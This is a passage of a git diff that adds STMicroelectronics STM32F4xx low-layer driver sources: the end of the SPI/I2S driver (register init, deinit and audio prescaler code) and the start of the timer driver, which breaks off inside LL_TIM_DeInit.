+ +#define IS_LL_SPI_CRC_POLYNOMIAL(__VALUE__) ((__VALUE__) >= 0x1U) + +/** + * @} + */ + +/* Private function prototypes -----------------------------------------------*/ + +/* Exported functions --------------------------------------------------------*/ +/** @addtogroup SPI_LL_Exported_Functions + * @{ + */ + +/** @addtogroup SPI_LL_EF_Init + * @{ + */ + +/** + * @brief De-initialize the SPI registers to their default reset values. + * @param SPIx SPI Instance + * @retval An ErrorStatus enumeration value: + * - SUCCESS: SPI registers are de-initialized + * - ERROR: SPI registers are not de-initialized + */ +ErrorStatus LL_SPI_DeInit(SPI_TypeDef *SPIx) +{ + ErrorStatus status = ERROR; + + /* Check the parameters */ + assert_param(IS_SPI_ALL_INSTANCE(SPIx)); + +#if defined(SPI1) + if (SPIx == SPI1) + { + /* Force reset of SPI clock */ + LL_APB2_GRP1_ForceReset(LL_APB2_GRP1_PERIPH_SPI1); + + /* Release reset of SPI clock */ + LL_APB2_GRP1_ReleaseReset(LL_APB2_GRP1_PERIPH_SPI1); + + status = SUCCESS; + } +#endif /* SPI1 */ +#if defined(SPI2) + if (SPIx == SPI2) + { + /* Force reset of SPI clock */ + LL_APB1_GRP1_ForceReset(LL_APB1_GRP1_PERIPH_SPI2); + + /* Release reset of SPI clock */ + LL_APB1_GRP1_ReleaseReset(LL_APB1_GRP1_PERIPH_SPI2); + + status = SUCCESS; + } +#endif /* SPI2 */ +#if defined(SPI3) + if (SPIx == SPI3) + { + /* Force reset of SPI clock */ + LL_APB1_GRP1_ForceReset(LL_APB1_GRP1_PERIPH_SPI3); + + /* Release reset of SPI clock */ + LL_APB1_GRP1_ReleaseReset(LL_APB1_GRP1_PERIPH_SPI3); + + status = SUCCESS; + } +#endif /* SPI3 */ +#if defined(SPI4) + if (SPIx == SPI4) + { + /* Force reset of SPI clock */ + LL_APB2_GRP1_ForceReset(LL_APB2_GRP1_PERIPH_SPI4); + + /* Release reset of SPI clock */ + LL_APB2_GRP1_ReleaseReset(LL_APB2_GRP1_PERIPH_SPI4); + + status = SUCCESS; + } +#endif /* SPI4 */ +#if defined(SPI5) + if (SPIx == SPI5) + { + /* Force reset of SPI clock */ + LL_APB2_GRP1_ForceReset(LL_APB2_GRP1_PERIPH_SPI5); + + /* Release reset of SPI clock */ + LL_APB2_GRP1_ReleaseReset(LL_APB2_GRP1_PERIPH_SPI5); + + status = SUCCESS; + } +#endif /* SPI5 */ +#if defined(SPI6) + if (SPIx == SPI6) + { + /* Force reset of SPI clock */ + LL_APB2_GRP1_ForceReset(LL_APB2_GRP1_PERIPH_SPI6); + + /* Release reset of SPI clock */ + LL_APB2_GRP1_ReleaseReset(LL_APB2_GRP1_PERIPH_SPI6); + + status = SUCCESS; + } +#endif /* SPI6 */ + + return status; +} + +/** + * @brief Initialize the SPI registers according to the specified parameters in SPI_InitStruct. + * @note As some bits in SPI configuration registers can only be written when the SPI is disabled (SPI_CR1_SPE bit =0), + * SPI peripheral should be in disabled state prior calling this function. Otherwise, ERROR result will be returned. + * @param SPIx SPI Instance + * @param SPI_InitStruct pointer to a @ref LL_SPI_InitTypeDef structure + * @retval An ErrorStatus enumeration value. (Return always SUCCESS) + */ +ErrorStatus LL_SPI_Init(SPI_TypeDef *SPIx, LL_SPI_InitTypeDef *SPI_InitStruct) +{ + ErrorStatus status = ERROR; + + /* Check the SPI Instance SPIx*/ + assert_param(IS_SPI_ALL_INSTANCE(SPIx)); + + /* Check the SPI parameters from SPI_InitStruct*/ + assert_param(IS_LL_SPI_TRANSFER_DIRECTION(SPI_InitStruct->TransferDirection)); + assert_param(IS_LL_SPI_MODE(SPI_InitStruct->Mode)); + assert_param(IS_LL_SPI_DATAWIDTH(SPI_InitStruct->DataWidth)); + assert_param(IS_LL_SPI_POLARITY(SPI_InitStruct->ClockPolarity)); + assert_param(IS_LL_SPI_PHASE(SPI_InitStruct->ClockPhase)); + assert_param(IS_LL_SPI_NSS(SPI_InitStruct->NSS)); + assert_param(IS_LL_SPI_BAUDRATE(SPI_InitStruct->BaudRate)); + assert_param(IS_LL_SPI_BITORDER(SPI_InitStruct->BitOrder)); + assert_param(IS_LL_SPI_CRCCALCULATION(SPI_InitStruct->CRCCalculation)); + + if (LL_SPI_IsEnabled(SPIx) == 0x00000000U) + { + /*---------------------------- SPIx CR1 Configuration ------------------------ + * Configure SPIx CR1 with parameters: + * - TransferDirection: SPI_CR1_BIDIMODE, SPI_CR1_BIDIOE and SPI_CR1_RXONLY bits + * - Master/Slave Mode: SPI_CR1_MSTR bit + * - DataWidth: SPI_CR1_DFF bit + * - ClockPolarity: SPI_CR1_CPOL bit + * - ClockPhase: SPI_CR1_CPHA bit + * - NSS management: SPI_CR1_SSM bit + * - BaudRate prescaler: SPI_CR1_BR[2:0] bits + * - BitOrder: SPI_CR1_LSBFIRST bit + * - CRCCalculation: SPI_CR1_CRCEN bit + */ + MODIFY_REG(SPIx->CR1, + SPI_CR1_CLEAR_MASK, + SPI_InitStruct->TransferDirection | SPI_InitStruct->Mode | SPI_InitStruct->DataWidth | + SPI_InitStruct->ClockPolarity | SPI_InitStruct->ClockPhase | + SPI_InitStruct->NSS | SPI_InitStruct->BaudRate | + SPI_InitStruct->BitOrder | SPI_InitStruct->CRCCalculation); + + /*---------------------------- SPIx CR2 Configuration ------------------------ + * Configure SPIx CR2 with parameters: + * - NSS management: SSOE bit + */ + MODIFY_REG(SPIx->CR2, SPI_CR2_SSOE, (SPI_InitStruct->NSS >> 16U)); + + /*---------------------------- SPIx CRCPR Configuration ---------------------- + * Configure SPIx CRCPR with parameters: + * - CRCPoly: CRCPOLY[15:0] bits + */ + if (SPI_InitStruct->CRCCalculation == LL_SPI_CRCCALCULATION_ENABLE) + { + assert_param(IS_LL_SPI_CRC_POLYNOMIAL(SPI_InitStruct->CRCPoly)); + LL_SPI_SetCRCPolynomial(SPIx, SPI_InitStruct->CRCPoly); + } + status = SUCCESS; + } + + /* Activate the SPI mode (Reset I2SMOD bit in I2SCFGR register) */ + CLEAR_BIT(SPIx->I2SCFGR, SPI_I2SCFGR_I2SMOD); + return status; +} + +/** + * @brief Set each @ref LL_SPI_InitTypeDef field to default value. + * @param SPI_InitStruct pointer to a @ref LL_SPI_InitTypeDef structure + * whose fields will be set to default values. + * @retval None + */ +void LL_SPI_StructInit(LL_SPI_InitTypeDef *SPI_InitStruct) +{ + /* Set SPI_InitStruct fields to default values */ + SPI_InitStruct->TransferDirection = LL_SPI_FULL_DUPLEX; + SPI_InitStruct->Mode = LL_SPI_MODE_SLAVE; + SPI_InitStruct->DataWidth = LL_SPI_DATAWIDTH_8BIT; + SPI_InitStruct->ClockPolarity = LL_SPI_POLARITY_LOW; + SPI_InitStruct->ClockPhase = LL_SPI_PHASE_1EDGE; + SPI_InitStruct->NSS = LL_SPI_NSS_HARD_INPUT; + SPI_InitStruct->BaudRate = LL_SPI_BAUDRATEPRESCALER_DIV2; + SPI_InitStruct->BitOrder = LL_SPI_MSB_FIRST; + SPI_InitStruct->CRCCalculation = LL_SPI_CRCCALCULATION_DISABLE; + SPI_InitStruct->CRCPoly = 7U; +} + +/** + * @} + */ + +/** + * @} + */ + +/** + * @} + */ + +/** @addtogroup I2S_LL + * @{ + */ + +/* Private types -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private constants ---------------------------------------------------------*/ +/** @defgroup I2S_LL_Private_Constants I2S Private Constants + * @{ + */ +/* I2S registers Masks */ +#define I2S_I2SCFGR_CLEAR_MASK (SPI_I2SCFGR_CHLEN | SPI_I2SCFGR_DATLEN | \ + SPI_I2SCFGR_CKPOL | SPI_I2SCFGR_I2SSTD | \ + SPI_I2SCFGR_I2SCFG | SPI_I2SCFGR_I2SMOD ) + +#define I2S_I2SPR_CLEAR_MASK 0x0002U +/** + * @} + */ +/* Private macros ------------------------------------------------------------*/ +/** @defgroup I2S_LL_Private_Macros I2S Private Macros + * @{ + */ + +#define IS_LL_I2S_DATAFORMAT(__VALUE__) (((__VALUE__) == LL_I2S_DATAFORMAT_16B) \ + || ((__VALUE__) == LL_I2S_DATAFORMAT_16B_EXTENDED) \ + || ((__VALUE__) == LL_I2S_DATAFORMAT_24B) \ + || ((__VALUE__) == LL_I2S_DATAFORMAT_32B)) + +#define IS_LL_I2S_CPOL(__VALUE__) (((__VALUE__) == LL_I2S_POLARITY_LOW) \ + || ((__VALUE__) == LL_I2S_POLARITY_HIGH)) + +#define IS_LL_I2S_STANDARD(__VALUE__) (((__VALUE__) == LL_I2S_STANDARD_PHILIPS) \ + || ((__VALUE__) == LL_I2S_STANDARD_MSB) \ + || ((__VALUE__) == LL_I2S_STANDARD_LSB) \ + || ((__VALUE__) == LL_I2S_STANDARD_PCM_SHORT) \ + || ((__VALUE__) == LL_I2S_STANDARD_PCM_LONG)) + +#define IS_LL_I2S_MODE(__VALUE__) (((__VALUE__) == LL_I2S_MODE_SLAVE_TX) \ + || ((__VALUE__) == LL_I2S_MODE_SLAVE_RX) \ + || ((__VALUE__) == LL_I2S_MODE_MASTER_TX) \ + || ((__VALUE__) == LL_I2S_MODE_MASTER_RX)) + +#define IS_LL_I2S_MCLK_OUTPUT(__VALUE__) (((__VALUE__) == LL_I2S_MCLK_OUTPUT_ENABLE) \ + || ((__VALUE__) == LL_I2S_MCLK_OUTPUT_DISABLE)) + +#define IS_LL_I2S_AUDIO_FREQ(__VALUE__) ((((__VALUE__) >= LL_I2S_AUDIOFREQ_8K) \ + && ((__VALUE__) <= LL_I2S_AUDIOFREQ_192K)) \ + || ((__VALUE__) == LL_I2S_AUDIOFREQ_DEFAULT)) + +#define IS_LL_I2S_PRESCALER_LINEAR(__VALUE__) ((__VALUE__) >= 0x2U) + +#define IS_LL_I2S_PRESCALER_PARITY(__VALUE__) (((__VALUE__) == LL_I2S_PRESCALER_PARITY_EVEN) \ + || ((__VALUE__) == LL_I2S_PRESCALER_PARITY_ODD)) +/** + * @} + */ + +/* Private function prototypes -----------------------------------------------*/ + +/* Exported functions --------------------------------------------------------*/ +/** @addtogroup I2S_LL_Exported_Functions + * @{ + */ + +/** @addtogroup I2S_LL_EF_Init + * @{ + */ + +/** + * @brief De-initialize the SPI/I2S registers to their default reset values. + * @param SPIx SPI Instance + * @retval An ErrorStatus enumeration value: + * - SUCCESS: SPI registers are de-initialized + * - ERROR: SPI registers are not de-initialized + */ +ErrorStatus LL_I2S_DeInit(SPI_TypeDef *SPIx) +{ + return LL_SPI_DeInit(SPIx); +} + +/** + * @brief Initializes the SPI/I2S registers according to the specified parameters in I2S_InitStruct. + * @note As some bits in SPI configuration registers can only be written when the SPI is disabled (SPI_CR1_SPE bit =0), + * SPI peripheral should be in disabled state prior calling this function. Otherwise, ERROR result will be returned. + * @param SPIx SPI Instance + * @param I2S_InitStruct pointer to a @ref LL_I2S_InitTypeDef structure + * @retval An ErrorStatus enumeration value: + * - SUCCESS: SPI registers are Initialized + * - ERROR: SPI registers are not Initialized + */ +ErrorStatus LL_I2S_Init(SPI_TypeDef *SPIx, LL_I2S_InitTypeDef *I2S_InitStruct) +{ + uint32_t i2sdiv = 2U; + uint32_t i2sodd = 0U; + uint32_t packetlength = 1U; + uint32_t tmp; + uint32_t sourceclock; + ErrorStatus status = ERROR; + + /* Check the I2S parameters */ + assert_param(IS_I2S_ALL_INSTANCE(SPIx)); + assert_param(IS_LL_I2S_MODE(I2S_InitStruct->Mode)); + assert_param(IS_LL_I2S_STANDARD(I2S_InitStruct->Standard)); + assert_param(IS_LL_I2S_DATAFORMAT(I2S_InitStruct->DataFormat)); + assert_param(IS_LL_I2S_MCLK_OUTPUT(I2S_InitStruct->MCLKOutput)); + assert_param(IS_LL_I2S_AUDIO_FREQ(I2S_InitStruct->AudioFreq)); + assert_param(IS_LL_I2S_CPOL(I2S_InitStruct->ClockPolarity)); + + if (LL_I2S_IsEnabled(SPIx) == 0x00000000U) + { + /*---------------------------- SPIx I2SCFGR Configuration -------------------- + * Configure SPIx I2SCFGR with parameters: + * - Mode: SPI_I2SCFGR_I2SCFG[1:0] bit + * - Standard: SPI_I2SCFGR_I2SSTD[1:0] and SPI_I2SCFGR_PCMSYNC bits + * - DataFormat: SPI_I2SCFGR_CHLEN and SPI_I2SCFGR_DATLEN bits + * - ClockPolarity: SPI_I2SCFGR_CKPOL bit + */ + + /* Write to SPIx I2SCFGR */ + MODIFY_REG(SPIx->I2SCFGR, + I2S_I2SCFGR_CLEAR_MASK, + I2S_InitStruct->Mode | I2S_InitStruct->Standard | + I2S_InitStruct->DataFormat | I2S_InitStruct->ClockPolarity | + SPI_I2SCFGR_I2SMOD); + + /*---------------------------- SPIx I2SPR Configuration ---------------------- + * Configure SPIx I2SPR with parameters: + * - MCLKOutput: SPI_I2SPR_MCKOE bit + * - AudioFreq: SPI_I2SPR_I2SDIV[7:0] and SPI_I2SPR_ODD bits + */ + + /* If the requested audio frequency is not the default, compute the prescaler (i2sodd, i2sdiv) + * else, default values are used: i2sodd = 0U, i2sdiv = 2U. + */ + if (I2S_InitStruct->AudioFreq != LL_I2S_AUDIOFREQ_DEFAULT) + { + /* Check the frame length (For the Prescaler computing) + * Default value: LL_I2S_DATAFORMAT_16B (packetlength = 1U). + */ + if (I2S_InitStruct->DataFormat != LL_I2S_DATAFORMAT_16B) + { + /* Packet length is 32 bits */ + packetlength = 2U; + } + + /* If an external I2S clock has to be used, the specific define should be set + in the project configuration or in the stm32f4xx_ll_rcc.h file */ + /* Get the I2S source clock value */ + sourceclock = LL_RCC_GetI2SClockFreq(LL_RCC_I2S1_CLKSOURCE); + + /* Compute the Real divider depending on the MCLK output state with a floating point */ + if (I2S_InitStruct->MCLKOutput == LL_I2S_MCLK_OUTPUT_ENABLE) + { + /* MCLK output is enabled */ + tmp = (((((sourceclock / 256U) * 10U) / I2S_InitStruct->AudioFreq)) + 5U); + } + else + { + /* MCLK output is disabled */ + tmp = (((((sourceclock / (32U * packetlength)) * 10U) / I2S_InitStruct->AudioFreq)) + 5U); + } + + /* Remove the floating point */ + tmp = tmp / 10U; + + /* Check the parity of the divider */ + i2sodd = (tmp & (uint16_t)0x0001U); + + /* Compute the i2sdiv prescaler */ + i2sdiv = ((tmp - i2sodd) / 2U); + + /* Get the Mask for the Odd bit (SPI_I2SPR[8]) register */ + i2sodd = (i2sodd << 8U); + } + + /* Test if the divider is 1 or 0 or greater than 0xFF */ + if ((i2sdiv < 2U) || (i2sdiv > 0xFFU)) + { + /* Set the default values */ + i2sdiv = 2U; + i2sodd = 0U; + } + + /* Write to SPIx I2SPR register the computed value */ + WRITE_REG(SPIx->I2SPR, i2sdiv | i2sodd | I2S_InitStruct->MCLKOutput); + + status = SUCCESS; + } + return status; +} + +/** + * @brief Set each @ref LL_I2S_InitTypeDef field to default value. + * @param I2S_InitStruct pointer to a @ref LL_I2S_InitTypeDef structure + * whose fields will be set to default values. + * @retval None + */ +void LL_I2S_StructInit(LL_I2S_InitTypeDef *I2S_InitStruct) +{ + /*--------------- Reset I2S init structure parameters values -----------------*/ + I2S_InitStruct->Mode = LL_I2S_MODE_SLAVE_TX; + I2S_InitStruct->Standard = LL_I2S_STANDARD_PHILIPS; + I2S_InitStruct->DataFormat = LL_I2S_DATAFORMAT_16B; + I2S_InitStruct->MCLKOutput = LL_I2S_MCLK_OUTPUT_DISABLE; + I2S_InitStruct->AudioFreq = LL_I2S_AUDIOFREQ_DEFAULT; + I2S_InitStruct->ClockPolarity = LL_I2S_POLARITY_LOW; +} + +/** + * @brief Set linear and parity prescaler. + * @note To calculate value of PrescalerLinear(I2SDIV[7:0] bits) and PrescalerParity(ODD bit)\n + * Check Audio frequency table and formulas inside Reference Manual (SPI/I2S). + * @param SPIx SPI Instance + * @param PrescalerLinear value Min_Data=0x02 and Max_Data=0xFF. + * @param PrescalerParity This parameter can be one of the following values: + * @arg @ref LL_I2S_PRESCALER_PARITY_EVEN + * @arg @ref LL_I2S_PRESCALER_PARITY_ODD + * @retval None + */ +void LL_I2S_ConfigPrescaler(SPI_TypeDef *SPIx, uint32_t PrescalerLinear, uint32_t PrescalerParity) +{ + /* Check the I2S parameters */ + assert_param(IS_I2S_ALL_INSTANCE(SPIx)); + assert_param(IS_LL_I2S_PRESCALER_LINEAR(PrescalerLinear)); + assert_param(IS_LL_I2S_PRESCALER_PARITY(PrescalerParity)); + + /* Write to SPIx I2SPR */ + MODIFY_REG(SPIx->I2SPR, SPI_I2SPR_I2SDIV | SPI_I2SPR_ODD, PrescalerLinear | (PrescalerParity << 8U)); +} + +#if defined (SPI_I2S_FULLDUPLEX_SUPPORT) +/** + * @brief Configures the full duplex mode for the I2Sx peripheral using its extension + * I2Sxext according to the specified parameters in the I2S_InitStruct. + * @note The structure pointed by I2S_InitStruct parameter should be the same + * used for the master I2S peripheral. In this case, if the master is + * configured as transmitter, the slave will be receiver and vice versa. + * Or you can force a different mode by modifying the field I2S_Mode to the + * value I2S_SlaveRx or I2S_SlaveTx independently of the master configuration. + * @param I2Sxext SPI Instance + * @param I2S_InitStruct pointer to a @ref LL_I2S_InitTypeDef structure + * @retval An ErrorStatus enumeration value: + * - SUCCESS: I2Sxext registers are Initialized + * - ERROR: I2Sxext registers are not Initialized + */ +ErrorStatus LL_I2S_InitFullDuplex(SPI_TypeDef *I2Sxext, LL_I2S_InitTypeDef *I2S_InitStruct) +{ + uint32_t mode = 0U; + ErrorStatus status = ERROR; + + /* Check the I2S parameters */ + assert_param(IS_I2S_EXT_ALL_INSTANCE(I2Sxext)); + assert_param(IS_LL_I2S_MODE(I2S_InitStruct->Mode)); + assert_param(IS_LL_I2S_STANDARD(I2S_InitStruct->Standard)); + assert_param(IS_LL_I2S_DATAFORMAT(I2S_InitStruct->DataFormat)); + assert_param(IS_LL_I2S_CPOL(I2S_InitStruct->ClockPolarity)); + + if (LL_I2S_IsEnabled(I2Sxext) == 0x00000000U) + { + /*---------------------------- SPIx I2SCFGR Configuration -------------------- + * Configure SPIx I2SCFGR with parameters: + * - Mode: SPI_I2SCFGR_I2SCFG[1:0] bit + * - Standard: SPI_I2SCFGR_I2SSTD[1:0] and SPI_I2SCFGR_PCMSYNC bits + * - DataFormat: SPI_I2SCFGR_CHLEN and SPI_I2SCFGR_DATLEN bits + * - ClockPolarity: SPI_I2SCFGR_CKPOL bit + */ + + /* Reset I2SPR registers */ + WRITE_REG(I2Sxext->I2SPR, I2S_I2SPR_CLEAR_MASK); + + /* Get the mode to be configured for the extended I2S */ + if ((I2S_InitStruct->Mode == LL_I2S_MODE_MASTER_TX) || (I2S_InitStruct->Mode == LL_I2S_MODE_SLAVE_TX)) + { + mode = LL_I2S_MODE_SLAVE_RX; + } + else + { + if ((I2S_InitStruct->Mode == LL_I2S_MODE_MASTER_RX) || (I2S_InitStruct->Mode == LL_I2S_MODE_SLAVE_RX)) + { + mode = LL_I2S_MODE_SLAVE_TX; + } + } + + /* Write to SPIx I2SCFGR */ + MODIFY_REG(I2Sxext->I2SCFGR, + I2S_I2SCFGR_CLEAR_MASK, + I2S_InitStruct->Standard | + I2S_InitStruct->DataFormat | I2S_InitStruct->ClockPolarity | + SPI_I2SCFGR_I2SMOD | mode); + + status = SUCCESS; + } + return status; +} +#endif /* SPI_I2S_FULLDUPLEX_SUPPORT */ + +/** + * @} + */ + +/** + * @} + */ + +/** + * @} + */ + +#endif /* defined (SPI1) || defined (SPI2) || defined (SPI3) || defined (SPI4) || defined (SPI5) || defined(SPI6) */ + +/** + * @} + */ + +#endif /* USE_FULL_LL_DRIVER */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_tim.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_tim.c new file mode 100644 index 000000000..089c5adeb --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_tim.c @@ -0,0 +1,1191 @@ +/** + ****************************************************************************** + * @file stm32f4xx_ll_tim.c + * @author MCD Application Team + * @brief TIM LL module driver. + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ +#if defined(USE_FULL_LL_DRIVER) + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_ll_tim.h" +#include "stm32f4xx_ll_bus.h" + +#ifdef USE_FULL_ASSERT +#include "stm32_assert.h" +#else +#define assert_param(expr) ((void)0U) +#endif /* USE_FULL_ASSERT */ + +/** @addtogroup STM32F4xx_LL_Driver + * @{ + */ + +#if defined (TIM1) || defined (TIM2) || defined (TIM3) || defined (TIM4) || defined (TIM5) || defined (TIM6) || defined (TIM7) || defined (TIM8) || defined (TIM9) || defined (TIM10) || defined (TIM11) || defined (TIM12) || defined (TIM13) || defined (TIM14) + +/** @addtogroup TIM_LL + * @{ + */ + +/* Private types -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private constants ---------------------------------------------------------*/ +/* Private macros ------------------------------------------------------------*/ +/** @addtogroup TIM_LL_Private_Macros + * @{ + */ +#define IS_LL_TIM_COUNTERMODE(__VALUE__) (((__VALUE__) == LL_TIM_COUNTERMODE_UP) \ + || ((__VALUE__) == LL_TIM_COUNTERMODE_DOWN) \ + || ((__VALUE__) == LL_TIM_COUNTERMODE_CENTER_UP) \ + || ((__VALUE__) == LL_TIM_COUNTERMODE_CENTER_DOWN) \ + || ((__VALUE__) == LL_TIM_COUNTERMODE_CENTER_UP_DOWN)) + +#define IS_LL_TIM_CLOCKDIVISION(__VALUE__) (((__VALUE__) == LL_TIM_CLOCKDIVISION_DIV1) \ + || ((__VALUE__) == LL_TIM_CLOCKDIVISION_DIV2) \ + || ((__VALUE__) == LL_TIM_CLOCKDIVISION_DIV4)) + +#define IS_LL_TIM_OCMODE(__VALUE__) (((__VALUE__) == LL_TIM_OCMODE_FROZEN) \ + || ((__VALUE__) == LL_TIM_OCMODE_ACTIVE) \ + || ((__VALUE__) == LL_TIM_OCMODE_INACTIVE) \ + || ((__VALUE__) == LL_TIM_OCMODE_TOGGLE) \ + || ((__VALUE__) == LL_TIM_OCMODE_FORCED_INACTIVE) \ + || ((__VALUE__) == LL_TIM_OCMODE_FORCED_ACTIVE) \ + || ((__VALUE__) == LL_TIM_OCMODE_PWM1) \ + || ((__VALUE__) == LL_TIM_OCMODE_PWM2)) + +#define IS_LL_TIM_OCSTATE(__VALUE__) (((__VALUE__) == LL_TIM_OCSTATE_DISABLE) \ + || ((__VALUE__) == LL_TIM_OCSTATE_ENABLE)) + +#define IS_LL_TIM_OCPOLARITY(__VALUE__) (((__VALUE__) == LL_TIM_OCPOLARITY_HIGH) \ + || ((__VALUE__) == LL_TIM_OCPOLARITY_LOW)) + +#define IS_LL_TIM_OCIDLESTATE(__VALUE__) (((__VALUE__) == LL_TIM_OCIDLESTATE_LOW) \ + || ((__VALUE__) == LL_TIM_OCIDLESTATE_HIGH)) + +#define IS_LL_TIM_ACTIVEINPUT(__VALUE__) (((__VALUE__) == LL_TIM_ACTIVEINPUT_DIRECTTI) \ + || ((__VALUE__) == LL_TIM_ACTIVEINPUT_INDIRECTTI) \ + || ((__VALUE__) == LL_TIM_ACTIVEINPUT_TRC)) + +#define IS_LL_TIM_ICPSC(__VALUE__) (((__VALUE__) == LL_TIM_ICPSC_DIV1) \ + || ((__VALUE__) == LL_TIM_ICPSC_DIV2) \ + || ((__VALUE__) == LL_TIM_ICPSC_DIV4) \ + || ((__VALUE__) == LL_TIM_ICPSC_DIV8)) + +#define IS_LL_TIM_IC_FILTER(__VALUE__) (((__VALUE__) == LL_TIM_IC_FILTER_FDIV1) \ + || ((__VALUE__) == LL_TIM_IC_FILTER_FDIV1_N2) \ + || ((__VALUE__) == LL_TIM_IC_FILTER_FDIV1_N4) \ + || ((__VALUE__) == LL_TIM_IC_FILTER_FDIV1_N8) \ + || ((__VALUE__) == LL_TIM_IC_FILTER_FDIV2_N6) \ + || ((__VALUE__) == LL_TIM_IC_FILTER_FDIV2_N8) \ + || ((__VALUE__) == LL_TIM_IC_FILTER_FDIV4_N6) \ + || ((__VALUE__) == LL_TIM_IC_FILTER_FDIV4_N8) \ + || ((__VALUE__) == LL_TIM_IC_FILTER_FDIV8_N6) \ + || ((__VALUE__) == LL_TIM_IC_FILTER_FDIV8_N8) \ + || ((__VALUE__) == LL_TIM_IC_FILTER_FDIV16_N5) \ + || ((__VALUE__) == LL_TIM_IC_FILTER_FDIV16_N6) \ + || ((__VALUE__) == LL_TIM_IC_FILTER_FDIV16_N8) \ + || ((__VALUE__) == LL_TIM_IC_FILTER_FDIV32_N5) \ + || ((__VALUE__) == LL_TIM_IC_FILTER_FDIV32_N6) \ + || ((__VALUE__) == LL_TIM_IC_FILTER_FDIV32_N8)) + +#define IS_LL_TIM_IC_POLARITY(__VALUE__) (((__VALUE__) == LL_TIM_IC_POLARITY_RISING) \ + || ((__VALUE__) == LL_TIM_IC_POLARITY_FALLING) \ + || ((__VALUE__) == LL_TIM_IC_POLARITY_BOTHEDGE)) + +#define IS_LL_TIM_ENCODERMODE(__VALUE__) (((__VALUE__) == LL_TIM_ENCODERMODE_X2_TI1) \ + || ((__VALUE__) == LL_TIM_ENCODERMODE_X2_TI2) \ + || ((__VALUE__) == LL_TIM_ENCODERMODE_X4_TI12)) + +#define IS_LL_TIM_IC_POLARITY_ENCODER(__VALUE__) (((__VALUE__) == LL_TIM_IC_POLARITY_RISING) \ + || ((__VALUE__) == LL_TIM_IC_POLARITY_FALLING)) + +#define IS_LL_TIM_OSSR_STATE(__VALUE__) (((__VALUE__) == LL_TIM_OSSR_DISABLE) \ + || ((__VALUE__) == LL_TIM_OSSR_ENABLE)) + +#define IS_LL_TIM_OSSI_STATE(__VALUE__) (((__VALUE__) == LL_TIM_OSSI_DISABLE) \ + || ((__VALUE__) == LL_TIM_OSSI_ENABLE)) + +#define IS_LL_TIM_LOCK_LEVEL(__VALUE__) (((__VALUE__) == LL_TIM_LOCKLEVEL_OFF) \ + || ((__VALUE__) == LL_TIM_LOCKLEVEL_1) \ + || ((__VALUE__) == LL_TIM_LOCKLEVEL_2) \ + || ((__VALUE__) == LL_TIM_LOCKLEVEL_3)) + +#define IS_LL_TIM_BREAK_STATE(__VALUE__) (((__VALUE__) == LL_TIM_BREAK_DISABLE) \ + || ((__VALUE__) == LL_TIM_BREAK_ENABLE)) + +#define IS_LL_TIM_BREAK_POLARITY(__VALUE__) (((__VALUE__) == LL_TIM_BREAK_POLARITY_LOW) \ + || ((__VALUE__) == LL_TIM_BREAK_POLARITY_HIGH)) + +#define IS_LL_TIM_AUTOMATIC_OUTPUT_STATE(__VALUE__) (((__VALUE__) == LL_TIM_AUTOMATICOUTPUT_DISABLE) \ + || ((__VALUE__) == LL_TIM_AUTOMATICOUTPUT_ENABLE)) +/** + * @} + */ + + +/* Private function prototypes -----------------------------------------------*/ +/** @defgroup TIM_LL_Private_Functions TIM Private Functions + * @{ + */ +static ErrorStatus OC1Config(TIM_TypeDef *TIMx, LL_TIM_OC_InitTypeDef *TIM_OCInitStruct); +static ErrorStatus OC2Config(TIM_TypeDef *TIMx, LL_TIM_OC_InitTypeDef *TIM_OCInitStruct); +static ErrorStatus OC3Config(TIM_TypeDef *TIMx, LL_TIM_OC_InitTypeDef *TIM_OCInitStruct); +static ErrorStatus OC4Config(TIM_TypeDef *TIMx, LL_TIM_OC_InitTypeDef *TIM_OCInitStruct); +static ErrorStatus IC1Config(TIM_TypeDef *TIMx, LL_TIM_IC_InitTypeDef *TIM_ICInitStruct); +static ErrorStatus IC2Config(TIM_TypeDef *TIMx, LL_TIM_IC_InitTypeDef *TIM_ICInitStruct); +static ErrorStatus IC3Config(TIM_TypeDef *TIMx, LL_TIM_IC_InitTypeDef *TIM_ICInitStruct); +static ErrorStatus IC4Config(TIM_TypeDef *TIMx, LL_TIM_IC_InitTypeDef *TIM_ICInitStruct); +/** + * @} + */ + +/* Exported functions --------------------------------------------------------*/ +/** @addtogroup TIM_LL_Exported_Functions + * @{ + */ + +/** @addtogroup TIM_LL_EF_Init + * @{ + */ + +/** + * @brief Set TIMx registers to their reset values. + * @param TIMx Timer instance + * @retval An ErrorStatus enumeration value: + * - SUCCESS: TIMx registers are de-initialized + * - ERROR: invalid TIMx instance + */ +ErrorStatus LL_TIM_DeInit(TIM_TypeDef *TIMx) +{ + ErrorStatus result = SUCCESS; + + /* Check the parameters */ + assert_param(IS_TIM_INSTANCE(TIMx)); + + if (TIMx == TIM1) + { + LL_APB2_GRP1_ForceReset(LL_APB2_GRP1_PERIPH_TIM1); + LL_APB2_GRP1_ReleaseReset(LL_APB2_GRP1_PERIPH_TIM1); + } +#if defined(TIM2) + else if (TIMx == TIM2) + { + LL_APB1_GRP1_ForceReset(LL_APB1_GRP1_PERIPH_TIM2); + LL_APB1_GRP1_ReleaseReset(LL_APB1_GRP1_PERIPH_TIM2); + } +#endif /* TIM2 */ +#if defined(TIM3) + else if (TIMx == TIM3) + { + LL_APB1_GRP1_ForceReset(LL_APB1_GRP1_PERIPH_TIM3); + LL_APB1_GRP1_ReleaseReset(LL_APB1_GRP1_PERIPH_TIM3); + } +#endif /* TIM3 */ +#if defined(TIM4) + else if (TIMx == TIM4) + { + LL_APB1_GRP1_ForceReset(LL_APB1_GRP1_PERIPH_TIM4); + LL_APB1_GRP1_ReleaseReset(LL_APB1_GRP1_PERIPH_TIM4); + } +#endif /* TIM4 */ +#if defined(TIM5) + else if (TIMx == TIM5) + { + 